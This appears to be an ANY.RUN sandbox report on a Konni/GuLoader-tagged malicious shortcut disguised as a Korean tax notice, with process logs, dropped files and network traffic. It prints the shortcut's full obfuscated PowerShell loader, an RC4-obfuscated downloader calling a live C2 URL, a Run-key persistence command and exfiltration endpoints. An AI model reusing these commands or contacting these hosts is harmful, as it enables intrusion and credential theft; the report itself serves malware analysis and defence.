File name:

오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk

Full analysis: https://app.any.run/tasks/f1f88e11-9c7f-4123-bd96-a08bd6d5da5e
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: January 14, 2025, 06:27:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
exfiltration
apt
konni
spyware
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, Unicoded, HasEnvironment, PreferEnvironmentPath, length=0, window=showminnoactive
MD5:

F162170214CED849E4E8E6FDB29A0C61

SHA1:

F99BABE6E5D219C74E8CC9703053AB02C529BF16

SHA256:

A1B67CFB080F4D1E4CBB0019A30259CB291F56C0ADA02E2CA1028F675B187727

SSDEEP:

3072:/mJaq11111111L11111C1ilB11O11V1W111811u111n1v111c1111NUTcu2cdTm4:cPccmQL0EsUfRlxEWHOg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Detected an obfuscated command line used with Guloader

      • powershell.exe (PID: 6528)

    • Changes the autorun value in the registry

      • reg.exe (PID: 5392)

    • KONNI has been detected (SURICATA)

      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6560)
      • powershell.exe (PID: 6816)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 6456)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6236)
      • cmd.exe (PID: 6424)

    • Likely accesses (executes) a file from the Public directory

      • wscript.exe (PID: 6232)
      • expand.exe (PID: 3952)
      • reg.exe (PID: 5392)
      • cmd.exe (PID: 6480)
      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 7132)
      • unzip.exe (PID: 624)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6456)
      • powershell.exe (PID: 6560)
      • expand.exe (PID: 4544)

    • Application launched itself

      • cmd.exe (PID: 6424)
      • cmd.exe (PID: 6236)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 6236)
      • cmd.exe (PID: 6480)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6424)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6236)
      • cmd.exe (PID: 6480)

    • Manipulates environment variables

      • powershell.exe (PID: 6528)

    • Removes files via Powershell

      • powershell.exe (PID: 6528)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)

    • Unpacks CAB file

      • expand.exe (PID: 3952)
      • expand.exe (PID: 4544)

    • The process executes VB scripts

      • powershell.exe (PID: 6528)

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 6232)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6232)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6480)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6456)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6456)
      • powershell.exe (PID: 6560)

    • Unpacks password protected archive

      • cmd.exe (PID: 6480)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6480)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6480)

    • The process connected to a server suspected of theft

      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)

    • Executable content was dropped or overwritten

      • expand.exe (PID: 3952)

  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6528)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6528)
      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6484)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6560)
      • powershell.exe (PID: 6456)

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 7072)

    • The process uses the downloaded file

      • powershell.exe (PID: 6528)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 6456)

    • Manual execution by a user

      • cmd.exe (PID: 6480)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6484)

    • Disables trace logs

      • powershell.exe (PID: 3772)
      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6456)

    • Checks supported languages

      • unzip.exe (PID: 624)
      • expand.exe (PID: 3952)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7132)
      • powershell.exe (PID: 6816)
      • powershell.exe (PID: 6560)

    • Reads the machine GUID from the registry

      • expand.exe (PID: 3952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath
FileAttributes: (none)
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
Description: hwp File
CommandLineArguments: /c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function harmless{param($island); <#resolution pervert#>$honest = $island.substring(0,$island.length-4) + ''; <#conduct distress#>return $honest;};function crime{param($clay);<#consult invest#> remove-item <#composing legislative#> -path $clay <#indulgence insoluble#> -force;};function ellipse{param($igneous,$reducing,$often,$brown,$ship);<#demand cleave#> $roundish=New-Object System.IO.FileStream(<#standard board#>$igneous,<#inscription winding#>[System.IO.FileMode]::Open,<#narrowly social#>[System.IO.FileAccess]::Read);<#qualified turning#> $roundish.Seek(<#almost corner#>$reducing,[System.IO.SeekOrigin]::Begin);<#training steam#> $inheritance=$often*0x01;<#restraint tumult#> $feed=New-Object byte[] <#angles cautious#>$often; <#sculpture offspring#> $leader=New-Object byte[] <#domestic controversy#>$inheritance; <#milk fellow#>$roundish.Read(<#perpetual array#>$leader,0,<#shape graduated#>$inheritance); $roundish.Close();$people=0;while($people -lt $often){<#roof alarm#>$feed[$people]=$leader[$people*0x01] -bxor $brown;$people++;}<#rule conquer#> set-content $ship <#edible fate#> $feed -Encoding <#going pricking#> Byte;};function sensitive{param($sour, $diamond);<#bail milk#> expand $sour <#moment flatter#> -F:* $diamond;};function sprinkle{$obstruction = $env:public<#devotion sometimes#> + '\' +<#playing inclosure#> 'doc'+'ume'+'nt'+'s';<#eastern strike#> return $obstruction;};function wife{param($forming); <#fruitful formula#>$slide = Split-Path $forming;<#dexterity customary#> return $slide;};function stately{return Get-Location;};function conquest{<#strength prove#>return $env:Temp;};function prejudice{$chalk = stately; $chart = line -vigorous $chalk; <#restrict duty#>if($chart.length -eq 0) {$chalk = conquest; <#estimation octave#>$chart = line -vigorous $chalk;} return $chart;};function product{$extraction = $env:public<#fourth northern#> + '\' + 'eg'+'ypt'+'ia'+'n.c'+'ab';<#strength ending#> return $extraction;};function carrying{$rhyme = $env:public<#likeness precipitate#>+'\do'+'cume'+'nt'+'s\s'+'tart'+'.vb'+'s';<#token electric#> return $rhyme;};function line{param($vigorous); $raised = @(); $happiness = [System.IO.Directory]::GetDirectories($vigorous); $surpass = [System.IO.Directory]::GetFiles($vigorous); foreach ($file in $surpass) { $fright = New-Object System.IO.FileInfo $file; if ($fright.Extension -ieq '.ln'+'k' -and $fright.Length -eq 0x000FB845) { $raised += $fright.FullName; } }; foreach ($subDir in $happiness) { $raised += line -dir $subDir; } return $raised[0];};$pottery = prejudice;<#grateful cushion#>$refractory = wife -forming $pottery;<#preacher labor#> $convey = harmless -island $pottery;ellipse -igneous <#but weak#> $pottery -reducing <#nasal discern#> 0x00002192 -often 0x00006C00 -brown <#insoluble division#> 0x2B -ship <#golden collection#> $convey;<#accept limit#> & $convey;$manuscript=product;<#determine wicked#>ellipse -igneous <#prolific warm#> $pottery -reducing <#pour attended#> 0x00008D92 -often <#subjected provoke#> 0x00013CE1 -brown <#eagle political#> 0x72 -ship <#receptacle countries#> $manuscript;<#panel male#>crime -clay $pottery;$naturally = sprinkle;<#cluster desire#>sensitive -sour $manuscript -diamond <#wreck confirm#>$naturally;<#plastic fellow#>crime -clay $manuscript;$internal = <#reducing precedent#>carrying;<#prominent interval#>& $internal;") )
IconFileName: .hwp
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
151
Monitored processes
24
Malicious processes
9
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs #GULOADER powershell.exe no specs openwith.exe no specs expand.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs reg.exe powershell.exe unzip.exe no specs systeminfo.exe no specs tiworker.exe no specs timeout.exe no specs #KONNI powershell.exe #KONNI powershell.exe #KONNI powershell.exe #KONNI powershell.exe powershell.exe expand.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
624unzip.exe -o -P "a0" "C:\Users\Public\Documents\di3726.zip" C:\Users\Public\Documents\unzip.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
9
Modules
Images
c:\users\public\documents\unzip.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
3152systeminfo C:\Windows\System32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3540timeout -t 5 /nobreakC:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3772powershell -command "function MLGBRrjjOTu{param ($jqCTIhZAxl,$kfNUsRSHCDz);$JBIEmUsgSR = [System.Text.Encoding]::UTF8.GetBytes($jqCTIhZAxl); $ECAXqTKcgSu = [System.Text.Encoding]::UTF8.GetBytes($kfNUsRSHCDz);$VnsNRPPnlwed = New-Object byte[](256);$kxQuNhgwoH = New-Object byte[](256);for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$VnsNRPPnlwed[$nXgNVlbzwrTx] = $nXgNVlbzwrTx;$kxQuNhgwoH[$nXgNVlbzwrTx] = $ECAXqTKcgSu[$nXgNVlbzwrTx % $ECAXqTKcgSu.Length];}$UYdROjElaQ = 0;for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx] + $kxQuNhgwoH[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;}$MHAheRKHRFeM = New-Object byte[] $JBIEmUsgSR.Length;$nXgNVlbzwrTx = 0;$UYdROjElaQ = 0;for ($NwUmxAYFGscW = 0; $NwUmxAYFGscW -lt $JBIEmUsgSR.Length; $NwUmxAYFGscW++) {$nXgNVlbzwrTx = ($nXgNVlbzwrTx + 1) % 256;$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;$zBXVlJeTklt = ($VnsNRPPnlwed[$nXgNVlbzwrTx] + $VnsNRPPnlwed[$UYdROjElaQ]) % 256;$MHAheRKHRFeM[$NwUmxAYFGscW] = $JBIEmUsgSR[$NwUmxAYFGscW] -bxor $VnsNRPPnlwed[$zBXVlJeTklt];}$KzigMrYemXG = [System.Convert]::ToBase64String($MHAheRKHRFeM);return $KzigMrYemXG;};$QlHKpkaDhTHf = 'https://raleighice.com/wp-includes/js/inc/get.php?ra=iew&zw=lk0100';$liLROUyJNri = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$aVmsVMkBoEvn=(Get-Date).Ticks.ToString();$WwSdMQbZUdfJ = $QlHKpkaDhTHf.Split('?')[1];$qNNYHElwOS = MLGBRrjjOTu -jqCTIhZAxl $WwSdMQbZUdfJ -kfNUsRSHCDz $aVmsVMkBoEvn;$QlHKpkaDhTHf=$QlHKpkaDhTHf.Split('?')[0]+'?'+$aVmsVMkBoEvn+'='+[System.Web.HttpUtility]::UrlEncode($qNNYHElwOS);iwr -Uri $QlHKpkaDhTHf -OutFile $liLROUyJNri;" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
3952"C:\WINDOWS\system32\expand.exe" C:\Users\Public\egyptian.cab -F:* C:\Users\Public\documentsC:\Windows\System32\expand.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
4164timeout -t 57 /nobreakC:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4544expand rBZlI.cab -F:* C:\Users\Public\Documents\ C:\Windows\System32\expand.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
5392reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v startsvc1 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f C:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
5748C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
6232"C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\documents\start.vbs" C:\Windows\System32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
40 925
Read events
40 922
Write events
3
Delete events
0

Modification events

(PID) Process:(5392) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:startsvc1
Value:
C:\Users\Public\Documents\start.vbs
(PID) Process:(5748) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31155789
(PID) Process:(5748) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
2
Suspicious files
3
Text files
35
Unknown types
0

Dropped files

PID
Process
Filename
Type
3952expand.exeC:\Users\Public\Documents\75178709.battext
MD5:C13C5E30A28B3D960E9F110B6B3DF546
SHA256:22EFCCDC114D488CBCAA37A965BC401D3A6B32C3BC165C5C547BFFC49DC625AD
6528powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aq4xj2wg.0pf.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3952expand.exeC:\Users\Public\Documents\13107442.battext
MD5:478457B89392536099806F74B9F60BC5
SHA256:3646A4FB2C5378E65393B6C7B7A6977B7203FF2B3637CE53C0F7FC197C5AC1B2
6528powershell.exeC:\Users\Public\egyptian.cabcompressed
MD5:957ADDA6FD9BDB8DB2EF6A14F224F769
SHA256:EB43B1D364DD08B6A16406FFD458C18F267541864AEA8FC30B0BD1FA3AEF40AE
3952expand.exeC:\Users\Public\Documents\start.vbstext
MD5:11CDEFEFA9DE934730F266E6A08E7E16
SHA256:BE5A657DAB3DF9C50B6AA15FD214E9BA9879DF7899E7F844BBBC6767E614E6AB
6528powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_igsa20mp.fsm.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3952expand.exeC:\Users\Public\Documents\68354122.battext
MD5:2BF12F8FB8C2B2D8B0F0832BBF132A8C
SHA256:C3FC560BDAE5F2C0CDADC2C32E71D34EC31FDD7F033B1CC128370D34255EBA93
3952expand.exeC:\Users\Public\Documents\98755194.battext
MD5:F2CD33F7CE1F794881AA53AC19E6049D
SHA256:083E10819A8884D4085A9A53B2B8C88CE3CE8BB4DC9F4C2E1CC3F423C08B01B2
6480cmd.exeC:\Users\Public\Documents\d2.txttext
MD5:4C56A6F762421FC16CB49149C226AF87
SHA256:2783A58731044EC554C805EFC200E4EC6E687A52DEDBDFB439AD5BBFF5E31816
6480cmd.exeC:\Users\Public\Documents\d3.txttext
MD5:9B6C546F888BE4E74825ABF848766905
SHA256:F37DD18412547C87025D6BEBADB5EC308E8DFF0498D55579025F34F9908603D3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
38
DNS requests
19
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6484
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
unknown
unknown
6360
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7132
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
unknown
unknown
6816
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
5064
SearchApp.exe
2.23.227.208:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.14
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 2.23.227.208
  • 2.23.227.215
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
login.live.com
  • 20.190.159.4
  • 20.190.159.0
  • 20.190.159.75
  • 20.190.159.73
  • 20.190.159.2
  • 40.126.31.71
  • 20.190.159.68
  • 40.126.31.69
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
raleighice.com
  • 162.241.219.212
unknown
www.fantasiasognorealta.com
  • 31.11.36.13
unknown

Threats

PID
Process
Class
Message
6484
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
7132
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6816
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6560
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6456
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk